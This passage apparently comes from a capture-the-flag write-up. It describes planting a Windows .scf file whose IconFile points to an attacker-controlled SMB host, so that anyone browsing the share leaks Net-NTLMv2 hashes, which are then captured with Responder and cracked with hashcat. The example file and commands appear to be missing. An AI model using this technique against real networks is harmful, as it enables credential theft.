A classic attack when you have write access to a file share is to drop a
.scf file that references an icon file on an SMB share on an attacker-controlled host. If the folder containing the
.scf file is opened with File Explorer, the
.scf will inspire Explorer to connect back to get that icon file, and offer Net-NTLMv2 auth negotiation. If I control that host, and I can capture that exchange and try to crack the Net-NTLMv2 using an offline bruteforce (like
hashcat). I used this technique on the Insane machine Sizzle back in 2019.
SCF files are Windows Shell Command files, and there are way more references on how to make a malicious one than legit uses. Some old Microsoft pages (that no longer exist, but are on the Wayback Machine) show how to create a Show Desktop Shortcut and a View Channels Quick Launch using SCF files. The format is:
I’ll abuse the
IconFile bit, but having it point to my server over SMB, and create
responder, which will start many different kinds of server (including SMB) to listen and try to get Net-NTLMv2 challenges.